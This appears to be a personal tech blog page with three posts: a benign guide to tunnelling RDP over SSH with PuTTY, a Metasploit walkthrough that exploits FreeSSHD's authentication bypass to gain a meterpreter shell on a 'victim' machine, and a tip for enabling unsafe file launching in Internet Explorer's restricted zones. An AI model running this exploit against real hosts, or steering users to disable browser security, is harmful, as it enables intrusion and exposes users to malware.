Top
JohnKlann / Posts tagged "featured"
remote_desktop_connection_setup

How To: RDP Over SSH

So I have been using RDP over SSH for about the last year and I have found its stability to be much better than Logmein, teamviewer, VNC, and many others. While this method may not have all the fancy features that these other tools have, there is less lag, better performance overall, its free, its secure, and there is no middle server its direct point to point!

Requirements:

  1. SSHD server running on the windows machine you would like to RDP into. I would suggest using Cygwin rather than FreeSSHD due to security exploits.
  2. RDP/Remote Desktop Connections enable on this server. (This will be covered)
  3. The ability to setup port forwarding on your external router. Setup Forwarding
  4. The external IP Address of the network your server is connected to. Your IP
  5. Putty Client

Part One: Setting up the Windows Server.

Once you have a ssh server up and configured the next step is to enable RDP on your windows server.

  1. Open the start menu , right click on computer and select properties.
    start_menu_computer_properties

    start_menu_computer_properties

     

  2. In the properties window in the top left pane select remote settings.
  3. In the new “System Properties” window under the Remote tab check the box labeled “Allow Remote Assistance connections to this computer”
  4. Next in the same window  under the Remote Desktop section, select  “Allow connections from computers running any version of Remote Desktop” option.
  5. Then click “apply” , then “ok”.
    enable_remote_control

    enable_remote_control

     

Part Two: Setting up the Client machine for connection.

Once you have downloaded and opened the putty client it is time to set up the ssh session and tunnels.

  1. One the main putty page enter the external IP Address of your windows server the box labeled “Host Name (or IP address)”.
    putty_home_setup

    putty_home_setup

     

  2. In the left pane of the putty utility expand the SSH node and select Tunnels.
  3. In the box labeled “Source Port” enter a free port on your local system. For this I will use port 1234 as it is normally free.
  4. In the box labeled “Destination” enter the local IP address of your windows server followed by “:3389” the port for RDP.
  5. Leave the default settings below this set to “local” and “Auto”.
  6. Then Select “Add”.
    putty_rdp_tunnel_setup

    putty_rdp_tunnel_setup

     

  7. Now select the main putty page in the left pane at the very top labeled “Session”.
  8. In the “Saved Sessions” box enter a name you would like to save your configuration. as so you do not have to set this up again.
  9. Then press “Save”.
    putty_save_profile

    putty_save_profile

     

  10. Note: To open this session in the future select it from the list and select “Load”
  11. Then Select “Open” This will start the SSH session.
  12. Now for the final steps to open the RDP session. Open the start menu and search for “Remote Desktop Connection” and then open it.
    find_remote_desktop_connection

    find_remote_desktop_connection

     

  13. Then in the box labeled “Computer” enter Localhost: followed by the port selected to use in the putty configuration. In this case port 1234.
  14. Then Select Connect.
    remote_desktop_connection_setup

    remote_desktop_connection_setup

     

  15. Now it will prompt you with a credentials box. Just enter your account information and select “OK”.
    enter_remote_desktop_credentials

    enter_remote_desktop_credentials

     

  16. And Now you have a RDP Session over SSH!
    emote_desktop_connection_complete

    emote_desktop_connection_complete

 

 

jklann

Kali Linux: Hacking FreeSSHD on Windows to get a meterpreter shell

So I found and interesting exploit in metasploit today mainly out of boredom and I figured I would share here. Below you will find a step my step of how to use metasploit to exploit FreeSSHD on windows to get a meterpreter shell.

start: FreeSSHD on your windows Victim box and check for any custom ports.

freesshd_configurations

freesshd_configurations

start: mfsconsole in kali

msfconsole

msfconsole

search: ssh

search_ssh

search_ssh

copy: exploit/windows/ssh/freesshd_authbypass

run: use exploit/windows/ssh/freesshd_authbypass

run: show options

use_exploit_options

use_exploit_options

run: set RHOST [victim ip]

run: set RPORT [victim port running ssh]

run: set LHOST [host ip]

run: set LPORT [local listening port]

exploit_settings

exploit_settings

run: exploit

exploit_shell

exploit_shell

Note: This exploit uses a user name list for the attack if the user that the ssh service uses to authenticate is not in this list this exploit won’t work. However there is an option you can set if you know the username or wish to guess at it.

ex: set USERNAME crazy_user123456789

Note: Also you can always find larger user name lists and add them to the list that metasploit uses located at “/opt/metasploit/apps/pro/msf3/data/wordlists/unix_users.txt” or you can change this path to point at your own list using the

ex: set USER_FILE /youpath/users.txt

Note: Kali of course has built in wordlist which you can find at the following location

ex: usr/share/dirbuster/wordlists/

Note: Once the exploit works you have a meterpreter shell :)

Solution if you are trying to protect against this attack, use a complicated username or use cygwin sshd for windows operating systems instead.

jklann
these files cannot be opened.

These files can’t be opened. Your Internet security settings prevented one or more files from being opened.

I came across this today while trying to run an unsigned, potentially harmful executable. There are plenty of recommendations out there on the web on how to fix this, but I found the fastest solution to be as follows.

Open internet explorer and select internet options:

internet_explorer_settings

internet_explorer_settings

Next select the security tab then restricted sites:

internet_explorer_settings_security+restricted_sites

internet_explorer_settings_security+restricted_sites

Now Select custom level and in the new window scroll down and enable “launching applications and unsafe files(not secure)”:

internet_explorer_settings+security_settings-restricted-sites-zone

internet_explorer_settings+security_settings-restricted-sites-zone

Select ok and agree to the warning:

internet_explorer_settings+warning!

internet_explorer_settings+warning!

Now try to run your executable. If this still does not work try using the above steps on the internet, local intranet, and trusted sites zones:

internet_explorer_settings+main_menu

internet_explorer_settings+main_menu

Hope this helps!

jklann